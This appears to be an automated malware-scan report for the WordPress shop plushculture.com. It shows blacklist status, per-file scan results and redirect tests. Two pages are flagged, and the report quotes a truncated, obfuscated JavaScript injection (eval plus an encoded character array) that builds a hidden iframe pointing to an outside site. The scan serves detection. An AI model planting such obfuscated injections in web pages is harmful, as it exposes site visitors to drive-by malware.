Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=plushculture.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://plushculture.com/ | 200 OK Content-Length: 16536 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ss=eval(\"Str\"+\"ing\");d=document;a=\"68,77,70,65,76,6b,71,70,22,7c,7c,7c,68,68,68,2a,2b,22,7d,f,c,22,22,22,22,78,63,74,22,6d,7a,74,7c,74,22,3f,22,66,71,65,77,6f,67,70,76,30,65,74,67,63,76,67,47,6e,67,6f,67,70,76,2a,29,6b,68,74,63,6f,67,29,2b,3d,f,c,f,c,22,22,22,22,6d,7a,74,7c,74,30,75,74,65,22,3f,22,29,6a,76,76,72,3c,31,31,66,67,63,70,69,74,7c,67,6e,63,6d,30,65,71,6f,31,79,72,2f,6b,70,65,6e,77,66,67,75,31,74,67,6e,30,72,6a,72,29,3d,f,c,22,22,22,22,6d,7a,74,7c,74,30,75,76,7b,6e,67,30,72,71,75, Antivirus reports:
| ||
http://plushculture.com/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 93658 Content-Type: application/javascript | clean |
http://plushculture.com/wp-content/plugins/wp-e-commerce/wpsc-core/js/wp-e-commerce.js?ver=3.8.9.4.637865 | 200 OK Content-Length: 30065 Content-Type: application/javascript | clean |
http://plushculture.com/wp-content/plugins/wp-e-commerce/wpsc-core/js/jquery.infieldlabel.min.js?ver=3.8.9.4.637865 | 200 OK Content-Length: 1787 Content-Type: application/javascript | clean |
http://plushculture.com/wp-content/plugins/wp-e-commerce/wpsc-core/js/ajax.js?ver=3.8.9.4.637865 | 200 OK Content-Length: 2693 Content-Type: application/javascript | clean |
http://plushculture.com/index.php?wpsc_user_dynamic_js=true&ver=3.8.9.4.637865 | 200 OK Content-Length: 1000 Content-Type: text/javascript | clean |
http://plushculture.com/wp-content/plugins/wp-e-commerce/wpsc-admin/js/jquery.livequery.js?ver=1.0.3 | 200 OK Content-Length: 6714 Content-Type: application/javascript | clean |
http://plushculture.com/wp-content/plugins/wp-e-commerce/wpsc-core/js/user.js?ver=3.8.9.4637865 | 200 OK Content-Length: 14672 Content-Type: application/javascript | clean |
http://plushculture.com/wp-content/plugins/wp-e-commerce/wpsc-core/js/thickbox.js?ver=Instinct_e-commerce | 200 OK Content-Length: 14444 Content-Type: application/javascript | clean |
http://plushculture.com/wp-includes/js/jquery/jquery.query.js?ver=2.1.7 | 200 OK Content-Length: 3788 Content-Type: application/javascript | clean |
http://plushculture.com/wp-content/plugins/gold_cart_plugin/js/gold_cart.js?ver=3.5 | 200 OK Content-Length: 4373 Content-Type: application/javascript | clean |
http://plushculture.com/wp-content/themes/responsive/js/responsive-modernizr.js?ver=2.6.1 | 200 OK Content-Length: 15117 Content-Type: application/javascript | clean |
http://plushculture.com/wp-content/themes/responsive/js/responsive-scripts.js?ver=1.2.1 | 200 OK Content-Length: 11074 Content-Type: application/javascript | clean |
http://plushculture.com/wp-content/themes/responsive/js/responsive-plugins.js?ver=1.1.1 | 200 OK Content-Length: 1082 Content-Type: application/javascript | clean |
http://plushculture.com/?page_id=4 | 200 OK Content-Length: 17154 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ss=eval(\"Str\"+\"ing\");d=document;a=\"68,77,70,65,76,6b,71,70,22,7c,7c,7c,68,68,68,2a,2b,22,7d,f,c,22,22,22,22,78,63,74,22,6d,7a,74,7c,74,22,3f,22,66,71,65,77,6f,67,70,76,30,65,74,67,63,76,67,47,6e,67,6f,67,70,76,2a,29,6b,68,74,63,6f,67,29,2b,3d,f,c,f,c,22,22,22,22,6d,7a,74,7c,74,30,75,74,65,22,3f,22,29,6a,76,76,72,3c,31,31,66,67,63,70,69,74,7c,67,6e,63,6d,30,65,71,6f,31,79,72,2f,6b,70,65,6e,77,66,67,75,31,74,67,6e,30,72,6a,72,29,3d,f,c,22,22,22,22,6d,7a,74,7c,74,30,75,76,7b,6e,67,30,72,71,75, Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: plushculture.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 25 Jan 2015 04:08:56 GMT
Pragma: no-cache
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4
Content-Encoding: none
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=9816193a6045889a9fe1baed517e1eae; path=/
Set-Cookie: wpsc_customer_cookie_38ba906d094bb246b9b74eb964a1d9d4=_m4om99hvxEqu%7C1422331737%7C93b7ef8e04a5f62f0d8ead3129eed601; expires=Tue, 27-Jan-2015 04:08:57 GMT; path=/; httponly
X-Pingback: http://plushculture.com/xmlrpc.php
X-Powered-By: PHP/5.4.30
GET / HTTP/1.1
Host: plushculture.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 25 Jan 2015 04:08:56 GMT
Pragma: no-cache
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4
Content-Encoding: none
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=9816193a6045889a9fe1baed517e1eae; path=/
Set-Cookie: wpsc_customer_cookie_38ba906d094bb246b9b74eb964a1d9d4=_m4om99hvxEqu%7C1422331737%7C93b7ef8e04a5f62f0d8ead3129eed601; expires=Tue, 27-Jan-2015 04:08:57 GMT; path=/; httponly
X-Pingback: http://plushculture.com/xmlrpc.php
X-Powered-By: PHP/5.4.30
Second query (visit from search engine):
GET / HTTP/1.1
Host: plushculture.com
Referer: http://www.google.com/search?q=plushculture.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: plushculture.com
Referer: http://www.google.com/search?q=plushculture.com
Result:
The result is similar to the first query. There are no suspicious redirects found.